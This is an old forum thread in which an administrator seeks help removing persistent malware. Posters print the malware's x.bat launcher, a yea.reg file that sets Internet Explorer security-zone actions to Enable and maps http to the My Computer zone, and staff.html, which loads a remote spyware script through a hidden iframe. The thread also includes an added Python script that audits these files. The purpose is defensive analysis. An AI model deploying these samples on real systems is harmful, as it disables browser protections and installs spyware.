Thread: Possible infection, with odd list of running processes

  1. #1
    Junior Member
    Join Date
    Jun 2004
    Posts
    8

    Possible infection, with odd list of running processes

    Good afternoon everyone,

    I've got a remote "super user" who managed to sneak her infected machine on the network, and suddenly, I know exactly which machines got overlooked during the last security scan.

    All but one have been cleaned up, but the remaining infected machine is proving to be a tough nut to crack. I've run Sophos and Trend Micro AV against it, followed by a few rounds of AdAware and SpyBot, mixed in with a little CWShredder. The problems are still there however, and I have identified the following list of files that seem a bit suspicious.

    svchosting.exe
    command.eve
    wserv32.exe
    x.bat
    yea.reg
    staff.html

    According to the searches I've done, these files all belong to a number of different (old) virus variants, but I can't seem to find anything that leaves all of the above.
    Any thoughts?

  2. #2
    Sounds like you've got the scanning tools you need. Have you run those scans in "safe mode" (F8 on boot)? Are you positive that adaware, AVs, and spybot are completely updated? Search for that staff.html file, don't execute it, but read its contents with a plaintext editor like notepad. Same deal with x.bat. It'll help you fingerprint the malware. wserv32.exe looks like it could be trying to act as a webserver, by the name of it. Try browsing to the infected machine's address with all scripting off. Obviously I haven't googled the names of those files, but let us know after you have those steps handled.

    Also try AVG antivirus, bitdefender AV, ClamAV as other optional scanners.

  3. #3
    Und3ertak3r (The Doctor)
    Join Date
    Apr 2002
    Posts
    2,744
    Is the Box fully patched?

    wserv32 could be related to this..

    http://www.trendmicro.com/vinfo/viru...e=WORM_RBOT.AF
    http://www.arkateq.com/virus/698.htm

    There are a few "toys" that use x.bat, staff.html and yea.reg; I have only seen listings with these, no actual information as to what they were..

    Command.eve may be related to an image editing prog EVE
    http://www.dpspro.com/tcs_commands/tcsos_eve.html

    Would be interesting to have a look at the code behind a couple of those..


    Cheers
    "Consumer technology now exceeds the average person's ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  4. #4
    Junior Member
    Join Date
    Jun 2004
    Posts
    8
    Ok, as per Soda's request, I've managed to isolate a few of the files and I'm posting their contents.

    First, x.bat

    @echo off

    REGEDIT.EXE /S YEA.REG

    staff.html

    x.html

    exit

    Pretty damn simple. So, let's see what yea.reg does.

    Windows Registry Editor Version 5.00

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
    "1004"=dword:00000000
    "1201"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
    "1004"=dword:00000000
    "1201"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
    "1004"=dword:00000000
    "1201"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
    "1004"=dword:00000000
    "1201"=dword:00000000
    "1406"=dword:00000000
    "1A04"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
    "1004"=dword:00000000
    "1201"=dword:00000000
    "1001"=dword:00000000
    "1200"=dword:00000000
    "1400"=dword:00000000
    "1606"=dword:00000000
    "1607"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
    "http"=dword:00000000

    I'm not familiar with the way Windows goes about its registry business, but it looks like these keys are attempting to alter the way Internet Explorer handles its predefined security zones. Most likely in an attempt to make it easier for other bits of malware to gain access to the machine. Just speculation on my part though.

    Finally, staff.html
    <html>
    <title> .:[ y E a K u K z ]:. </title>
    <center>
    <body>
    <iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
    <script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
    <script language="JavaScript">
    mtrslib_uid = '1677';
    mtrslib_retry = 1;
    mt_set_onload();
    </script>
    </body>
    </center>
    </html>

    Not a clue what mtrslib2.js does, but I've added that domain to the hosts file on the local machines here, and have it pointed to an internal page.

    Any additional thoughts?
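    To turn the two artifacts above into something checkable, here is an added triage script (example code written for this thread, not something any poster or vendor supplied). It parses the yea.reg text into keys and values, reports every Internet Explorer URL-action that the file switches to Enable (dword 0) and every protocol that ProtocolDefaults maps to the My Computer zone, and scans staff.html for hidden iframes and scripts loaded from another host. The action and zone names are Microsoft's documented IE URL-action identifiers (0 = Enable, 1 = Prompt, 3 = Disable; zones 0-4 = My Computer, Local intranet, Trusted sites, Internet, Restricted sites). The embedded sample inputs are excerpted from the files posted in this thread; the function and variable names are my own.

```python
"""Triage helpers for a .reg file that loosens IE security zones and an
HTML dropper page with a hidden iframe (added example, not the thread's code)."""
import re
from html.parser import HTMLParser

# Microsoft's IE URL-action identifiers; registry value 0 = Enable,
# 1 = Prompt, 3 = Disable.
URL_ACTIONS = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe",
    "1400": "Active scripting",
    "1406": "Access data sources across domains",
    "1606": "Userdata persistence",
    "1607": "Navigate sub-frames across different domains",
    "1A04": "Don't prompt for client certificate selection",
}
ZONES = {"0": "My Computer", "1": "Local intranet", "2": "Trusted sites",
         "3": "Internet", "4": "Restricted sites"}
ZONE_KEY = re.compile(r"\\Internet Settings\\Zones\\(\d)$", re.I)
PROTO_KEY = re.compile(r"\\Internet Settings\\ZoneMap\\ProtocolDefaults$", re.I)

# Excerpt of the yea.reg posted above (zones 3 and 4 plus ProtocolDefaults).
YEA_REG_EXCERPT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
"http"=dword:00000000
"""

# staff.html as posted above.
STAFF_HTML = """<html><title> .:[ y E a K u K z ]:. </title><center><body>
<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
<script language="JavaScript">mtrslib_uid = '1677'; mt_set_onload();</script>
</body></center></html>"""


def parse_reg(text):
    """Parse 'Windows Registry Editor Version 5.00' text into {key: {name: value}}."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
        elif current is not None and "=" in line:
            name, value = line.split("=", 1)
            result[current][name.strip('"')] = value
    return result


def parse_dword(value):
    """Return the integer behind a 'dword:XXXXXXXX' value, else None."""
    return int(value[len("dword:"):], 16) if value.startswith("dword:") else None


def audit_zone_settings(reg):
    """List every zone action switched to Enable and every protocol mapped to zone 0."""
    findings = []
    for key, values in reg.items():
        zone_match = ZONE_KEY.search(key)
        if zone_match:
            zone = ZONES.get(zone_match.group(1), zone_match.group(1))
            for name, value in values.items():
                if name.upper() in URL_ACTIONS and parse_dword(value) == 0:
                    findings.append(f"{zone}: '{URL_ACTIONS[name.upper()]}' set to Enable")
        elif PROTO_KEY.search(key):
            for proto, value in values.items():
                if parse_dword(value) == 0:
                    findings.append(f"{proto}:// URLs mapped to the My Computer zone")
    return findings


class SuspiciousHTML(HTMLParser):
    """Collect hidden iframes and scripts fetched from another host."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and "hidden" in (a.get("style") or "").lower():
            self.findings.append(f"hidden iframe id={a.get('id')}")
        if tag == "script" and (a.get("src") or "").lower().startswith(("http://", "https://", "//")):
            self.findings.append(f"remote script {a['src']}")


def scan_html(text):
    parser = SuspiciousHTML()
    parser.feed(text)
    return parser.findings


if __name__ == "__main__":
    for line in audit_zone_settings(parse_reg(YEA_REG_EXCERPT)) + scan_html(STAFF_HTML):
        print(line)
```

    Run against the excerpt it prints twelve zone findings (four for the Internet zone, seven for Restricted sites, one for the http protocol mapping) and two HTML findings; the protocol line is the one to watch, since mapping http to zone 0 treats every web page as locally trusted regardless of the per-zone settings. Exporting the live key with reg export and feeding it to parse_reg shows whether the changes actually took.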

  5. #5
    Und3ertak3r (The Doctor)
    Join Date
    Apr 2002
    Posts
    2,744
    Didn't find my notes at work regarding where I had encountered X.bat and friends.

    But I did find mtrslib2.js source

    Found this in the body: "MediaTicketsInstallerDemo"

    full JS attached

    Sorry I can't offer better help..



    Cheers

    Edit: Had a machine late yesterday that had MediaTickets installed, as there appeared to be no associated uninstaller or menu listing..oh and the customer didn't know what it was.. I removed it... This same machine had a file "USER32.EXE" I think it was in the C:\Windows\System folder.. Any scan I ran on this file was clean.. did a quick check using Fileanalyser.. and it appears to be a component of a Mass mailer or a phone home bug..
    Check your system.INI and registry for references to this file.. it loads with explorer.exe

    Be careful.. user32.dll is a system file, don't confuse it with this file..


  6. #6
    Junior Member
    Join Date
    Jun 2004
    Posts
    8
    Originally posted here by Und3ertak3r
    Didn't find my notes at work regarding where I had encountered X.bat and friends.

    But I did find mtrslib2.js source

    Found this in the body: "MediaTicketsInstallerDemo"

    full JS attached

    Sorry I can't offer better help..



    Cheers
    This is great, thank you. I don't have the tools to pull .js apart, so I'm very happy with this.
    Looks to be some sort of spyware, but I'm no programmer, so...

    Hehe, turns out the kids who wrote this put their real phone number on the domain contact info for mt-download.com.
